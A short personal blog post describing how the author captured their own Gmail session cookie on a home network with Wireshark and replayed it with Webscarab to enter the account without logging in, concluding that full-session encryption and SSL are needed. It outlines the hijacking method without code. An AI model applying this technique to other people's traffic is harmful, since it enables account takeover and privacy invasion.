Do I smell Gmail cookies?

I have always wanted to know how session hijacking via cookie theft worked. So I decided to try it for my self on my home network. This vulnerability occurs when websites use session cookies to validate a users access to resources. Often websites encrypt the initial login session but then pass the session cookie back and forth in plain text. Under these conditions it is possible for an attacker to use a packet sniffer to capture the session cookie and use it to gain access to a victims a account. On my home network I was able to capture my Gmail session cookie using Wireshark. I was then able reinsert it back into a session on different computer using Webscarab and gain access to my account without logging in. To make things worse gmail sessions never really time out unless you logout. Since many people store valuable information in their email I feel like this is a particularly dangerous vulnerability. I think Gmail needs to encrypt their entire session. I don't think I will ever check my Gmail over an unsecure network again. I am going to start using my mail client with ssl instead.